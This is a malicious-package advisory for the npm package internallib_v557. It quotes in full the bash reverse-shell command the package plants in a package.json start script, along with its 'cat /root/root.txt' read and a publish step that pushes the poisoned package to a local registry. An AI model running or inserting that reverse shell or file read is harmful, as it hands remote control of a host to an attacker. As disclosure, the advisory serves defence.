
MAL-2026-5678

Malicious code in internallib_v557 (npm)

Details


## Source: amazon-inspector (5cfa498f80e5965de3c072803c8d6e812e75bc5a4fb031f739cbd9c181724be3) internallib_v557 has no legitimate functionality — its single exported `command()` function in index.js writes a malicious package.json to /tmp/uhclabs_local_check/ whose `start` script is a bash reverse shell to 10.0.0.145:9999 (`/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.145/9999 0>&1'`), then runs `npm publish --registry http://0.0.0.0:4873/` to push that reverse-shell-bearing package into a local Verdaccio registry where it can be pulled by other consumers. The same function also executes `cat /root/root.txt` and logs the contents to stdout, attempting to exfiltrate a privileged host file the package has no legitimate need to read. The harmful path fires when any consumer requires the package and invokes the advertised API; since the package has no other functionality, normal use guarantees compromise.


Affected packages

npm / internallib_v557

No fixed version published yet for internallib_v557 (npm). Pin to a known-safe version or switch to an alternative.
